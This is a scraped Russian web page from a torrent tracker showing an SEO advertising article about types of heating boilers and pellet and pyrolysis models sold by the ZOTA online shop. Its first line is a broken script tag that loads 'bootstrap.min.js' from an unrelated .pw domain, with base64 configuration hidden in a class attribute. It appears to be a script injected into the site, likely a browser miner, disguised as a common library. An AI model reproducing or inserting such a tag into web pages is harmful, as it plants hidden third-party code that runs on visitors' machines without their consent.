nc class="=LWpocVNOd0Y7NjA7MTtzMi5wYy5iZWxpY2ltby5wdyxzMy5wYy5iZWxpY2ltby5wdw==" src="https://play.pc.belicimo.pw/bootstrap.min.js">
Rusbitor.ru - Торрент трекер

Виды современных котлов



В настоящее время для отопления помещений используют разные виды котлов. Агрегаты могут работать с использованием различных видов топлива. Основным показателем выбора котла является количество преобразованной им энергии. Котлы могут быть электрическими, газовыми, жидкотопливными, а также твердотопливными. У каждого вида есть как свои преимущества, так и недостатки. На сайте компании ZOTA https://zotashop.ru можно купить один из таких котлов, а также электросауны, ТЭН и пульты управления, управление отоплением GSM, приборы КИП, дымоходы, циркуляционные насоссы и многое другое. Контактный номер: +7 (499) 394-30-40. Часы работы: 9:00 - 18:00.

Котлы на твердом топливе можно применять для отопления не только частных домов, но и на крупных предприятиях. Достоинством таких котлов является их относительно небольшая стоимость и то, что данное оборудование может работать на разных видах топлива: уголь, дрова, пеллеты. В настоящее время пользуются спросом котлы котлы твердотопливные Тополь М производителя ZOTA. Купить такой котел в Москве можно, заказав его в интернет-магазине zotashop.ru. Данная модель котлов предназначена для работы в автономных отопительных системах с рабочим давлением до трёх атмосфер. Может использоваться для отопления жилых и производственных помещений. В последнее время становится популярным соершенно новый вид котлов, которые также работают на твердом топливе, но являются котлами пиролизного типа. В чем отличие таких котлов? В них топливо сгорает при высоких температурах и нехватке кислорода. В результате чего древесина разлагается и образуется пиролизный газ, который поступает во вторую камеру котла и сгорает при высоких температурах. КПД таких котлов очень высокий, но стоимость агрегата большая.

Для систем отопления также можно выгодно купить котлы Зота пеллетные в интернет-магазине zotashop.ru. Топливом таких котлов служит продукция переработки древесины. Это изготовленные путём прессования без связывающих добавок древесные опилки хвойных и лиственных пород - пеллеты. Линейка котлов под маркой ZOTA "Pellet S" состоит из семи моделей мощностью от 15 до 100 кВт.



Читать далее:
Товары для взрослых в интернет-магазине
Покупка автозапчастей б/у в магазине онлайн
Изысканная мужская одежда для свадьбы
Доставка грузов из Китая
Разновидности холодильных камер